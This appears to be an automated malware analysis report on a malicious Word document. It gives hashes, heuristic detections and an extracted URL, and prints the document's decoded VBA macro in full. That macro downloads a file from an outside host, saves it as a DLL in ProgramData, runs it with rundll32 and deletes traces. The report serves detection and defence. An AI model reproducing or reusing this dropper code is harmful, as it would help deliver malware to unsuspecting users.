Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 7a6a225655a7c60a…

MALICIOUS

Office (OLE) / .DOC

31.0 KB Created: 2026-06-15 03:32:00 Authoring application: Microsoft Office Word First seen: 2026-06-18
MD5: 6e8878aea8d2321412522eb380daaadc SHA-1: 084368fe3df1baf20848aee8b87e835ab8bba187 SHA-256: 7a6a225655a7c60a5c065628a81b934c634fbbab634d12e2c53363679e2f291b
282 Risk Score

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
            Set wshShell = CreateObject("WScript.Shell")
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
            wshShell.Run "rundll32 " & filePath & ", DllRegisterServer"
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            adoStream.Write xmlHTTP.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xmlHTTP = CreateObject("MSXML2.XMLHTTP")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://7qfmzuglr45xs.com/nra962sc0/ft2dol9oy.php?l=cav2.cab Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1486 bytes
SHA-256: b856f83d3941382a720139e52b3303ea999744b8240a0053f7e6e501ff5b8d6d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub DownloadAndRunDLL()
    Dim url As String
    Dim filePath As String
    Dim xmlHTTP As Object
    Dim adoStream As Object
    Dim wshShell As Object
    Dim fso As Object

    url = "http://7qfmzuglr45xs.com/nra962sc0/ft2dol9oy.php?l=cav2.cab"
    filePath = "C:\ProgramData\a9xyi.dll"

    On Error Resume Next

    Set xmlHTTP = CreateObject("MSXML2.XMLHTTP")
    xmlHTTP.Open "GET", url, False
    xmlHTTP.Send

    If xmlHTTP.Status = 200 Then
        Set adoStream = CreateObject("ADODB.Stream")
        adoStream.Open
        adoStream.Type = 1 ' adTypeBinary
        adoStream.Write xmlHTTP.ResponseBody
        adoStream.SaveToFile filePath, 2 ' adSaveCreateOverWrite
        adoStream.Close
        
        Set wshShell = CreateObject("WScript.Shell")
        wshShell.Run "rundll32 " & filePath & ", DllRegisterServer"
        
        Set fso = CreateObject("Scripting.FileSystemObject")
        fso.DeleteFile "C:\ProgramData\aZwhHn.inf"
        fso.DeleteFile "C:\ProgramData\aTdcXq.sct"
    End If

    Set xmlHTTP = Nothing
    Set adoStream = Nothing
    Set wshShell = Nothing
    Set fso = Nothing
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.